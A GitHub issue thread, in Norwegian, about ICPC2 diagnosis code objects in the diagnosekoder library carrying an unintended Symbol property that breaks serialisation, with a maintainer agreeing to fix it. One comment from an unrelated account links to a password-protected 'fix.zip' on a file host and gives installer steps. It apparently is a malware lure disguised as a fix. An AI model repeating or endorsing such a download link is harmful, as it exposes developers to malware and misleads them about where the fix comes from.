### ISSUE TITLE
ICPC2-koder har et unødvendig symbol

### ISSUE THREAD

**Issue by karl-run** [navikt/diagnosekoder#110]
En runtime ble litt sint over at ICPC2-kodene ikke var 100% plain objekter når det skulle serialiseres over wirer'n, så nar jeg graver litt så ser jeg at ICD10-koder ser helt fine ut:

```typescript
  {
    code: "A000",
    text: "Kolera som skyldes Vibrio cholerae 01, biovar cholerae",
  }, {
    code: "A001",
    text: "Kolera som skyldes Vibrio cholerae 01, biovar eltor",
  }, {
    code: "A009",
    text: "Uspesifisert kolera",
  }
```

Mens ICPC2-koder har noe ekstra rusk, hvor alt er undefined:

```typescript
  {
    code: "A01",
    text: "Smerte generell/flere steder",
    [Symbol(icpc2)]: undefined,
  }, {
    code: "A02",
    text: "Frysninger",
    [Symbol(icpc2)]: undefined,
  }, {
    code: "A03",
    text: "Feber",
    [Symbol(icpc2)]: undefined,
  }
```

det er ikke noe problem for meg å mappe det vekk selv selvfølgelig, men det virker ikke som det var intensjonelt. :smiley:

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by karl-run** [comment]
@josstn du har ikke mulighet til å ta en titt? Kjenner ikke helt til bruken av symbols her, så vet ikke om jeg er i stand til å opprette PR. :smiley:

**Comment by josstn** [comment]
@karl-run Ja, skal ta ein titt på det 👍 

Tanken med å bruke symbol var vel for å ha ein måte å unngå å utilsikta blande ICD10 og ICD2 kodetyper, sjølv om dei har ein felles type øverst, viss eg hugsa rett.

**Comment by josstn** [comment]
Ser no at det er eit funksjonskall som bør endrast for ICPC2.ts, så skal fikse det.
